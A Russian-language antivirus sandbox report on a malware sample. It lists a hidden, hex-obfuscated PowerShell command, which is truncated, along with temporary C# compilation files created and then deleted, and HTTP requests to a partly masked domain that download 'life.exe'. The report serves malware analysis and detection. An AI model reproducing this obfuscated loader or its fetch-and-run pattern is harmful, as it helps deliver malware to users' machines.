Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function sa92d {param($u315d4)$ra3b87='ze8f19';$b29f4='';for ($i=0; $i -lt $u315d4.length;$i+=2){$bf581cd=[convert]::ToByte($u315d4.Substring($i,2),16);$b29f4+=[char]($bf5...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\9vwbz1qr.0.cs
- %TEMP%\9vwbz1qr.cmdline
- %TEMP%\9vwbz1qr.out
- %TEMP%\cscf17f.tmp
- %TEMP%\resf1ce.tmp
- %TEMP%\9vwbz1qr.dll
Удаляет следующие файлы
- %TEMP%\resf1ce.tmp
- %TEMP%\cscf17f.tmp
- %TEMP%\9vwbz1qr.out
- %TEMP%\9vwbz1qr.dll
- %TEMP%\9vwbz1qr.pdb
- %TEMP%\9vwbz1qr.0.cs
- %TEMP%\9vwbz1qr.cmdline
Сетевая активность
Подключается к
- 'pl##tech.id':80
- 'pl##tech.id':443
TCP
Запросы HTTP GET
- http://pl##tech.id/ji/life.exe
- http://www.pl##tech.id/ji/life.exe
Другие
- 'pl##tech.id':443
UDP
- DNS ASK pl##tech.id
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function sa92d {param($u315d4)$ra3b87='ze8f19';$b29f4='';for ($i=0; $i -lt $u315d4.length;$i+=2){$bf581cd=[convert]::ToByte($u315d4.Substring($i,2),16);$b29f4+=[char]($bf5...' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\9vwbz1qr.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESF1CE.tmp" "%TEMP%\CSCF17F.tmp"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\9vwbz1qr.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESF1CE.tmp" "%TEMP%\CSCF17F.tmp"
